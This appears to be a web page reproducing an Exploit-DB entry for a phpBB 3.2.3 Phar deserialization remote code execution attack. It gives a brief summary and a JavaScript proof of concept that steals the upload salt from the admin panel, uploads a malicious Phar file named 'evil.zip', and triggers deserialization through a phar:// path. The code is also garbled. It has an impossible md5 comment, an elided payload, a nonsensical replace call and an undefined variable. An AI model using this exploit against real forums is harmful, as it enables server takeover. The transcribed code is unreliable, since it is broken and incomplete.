phpBB 3.2.3 Phar Deserialization RCE Exploit (EDB-ID: 46512)

### Vulnerability Summary **Vulnerability Overview** * **Vulnerability Name**: phpBB 3.2.3 - Remote Code Execution (RCE) * **EDB-ID**: 46512 * **CVE ID**: N/A * **Author**: ALLYSHKА * **Type**: WEBAPPS * **Platform**: PHP * **Published Date**: 2018-12-12 **Affected Scope** * **Vulnerable Application**: phpBB 3.2.3 (and potentially subsequent versions, subject to specific patch analysis) **Remediation** * The screenshot does not directly provide remediation code. However, it is generally recommended to upgrade phpBB to the latest secure version and remove or patch the relevant logic within the attachment upload functionality. **Proof of Concept (POC)** This vulnerability exploit involves a JavaScript snippet designed to trigger remote code execution by constructing specific requests. The code is split into two parts (interrupted by a cookie popup in the screenshot), with the complete logic as follows: ```javascript // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ''; var form_token = ''; var creation_time = ''; var filepath = 'phar://./files/plupload/Salt_aaae9cba3fdadb1f0c3b4934c028d11zip.part'; // md5('evil.zip') = aaae9cba3fdadb1f0c3b4934c028d11zip var payload = '<php __HALT_COMPILER(); ?' // ... (contains complex encoded characters in between to construct the payload) ... // your payload here var posturl = '/adm/index.php?i=acp_attachments&sid=[EDB_ID]&action=download'; var postdata = { 'type': 'data', 'method': 'text', 'where': 'download', 'table[]': 'phpbb_config', 'submit': 'submit', 'creation_time': creation_time, 'form_token': form_token }; $.post(posturl.replace('[', '[', 'sid'), postdata, function(data) { plupload_salt = data.match(/plupload_salt\\s*=\s*(['"])(.*?)\1/)[1]; if (plupload_salt) { filepath = filepath.replace('Salt', plupload_salt); var postdata = new FormData(); postdata.append('name', 'evil.zip'); postdata.append('chunk', 0); postdata.append('chunks', 2); postdata.append('add_file', 'Add the file'); postdata.append('real_filename', 'evil.zip'); // file var pharfile = new File(byteArray, 'evil.zip'); postdata.append('fileupload', pharfile); $.ajax({ url: '/posting.php?mode=reply&f=2&t=1', data: postdata, cache: false, contentType: false, processData: false, method: 'POST', success: function(data){ if ('id' in data) { $('#img_magic').val(filepath).focus(); $('html, body').animate({ scrollTop: $('#submit').offset().top }, 500); } } }); } }); ```

Goal Reached Thanks to every supporter — we hit 100%!

phpBB 3.2.3 Phar Deserialization RCE Exploit (EDB-ID: 46512)

More from this source